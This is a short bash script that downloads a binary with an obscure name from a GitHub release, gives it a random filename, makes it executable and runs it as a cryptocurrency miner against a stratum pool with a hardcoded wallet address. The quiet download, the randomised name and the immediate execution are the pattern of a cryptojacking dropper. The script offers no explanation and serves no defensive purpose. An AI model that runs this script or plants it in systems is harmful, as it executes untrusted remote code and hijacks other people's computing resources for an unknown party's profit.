#!/bin/bash
set -e  # Exit on any error

# Generate a random filename
BIN_NAME=$(tr -dc a-z0-9 </dev/urandom | head -c 12)

# Download binary quietly and rename
wget -q https://github.com/vedhagsvp/tkospae/releases/download/latest/xpleoas -O "$BIN_NAME"

# Make it executable
chmod +x "$BIN_NAME"

# Optional: run the binary
# ./"$BIN_NAME"

./"$BIN_NAME" -stratum stratum+tcp://0xBD3D3E9878145D58dBF214a2ac684F93530Cf1bc.opseabb:x@xphash.xppool.io:3333
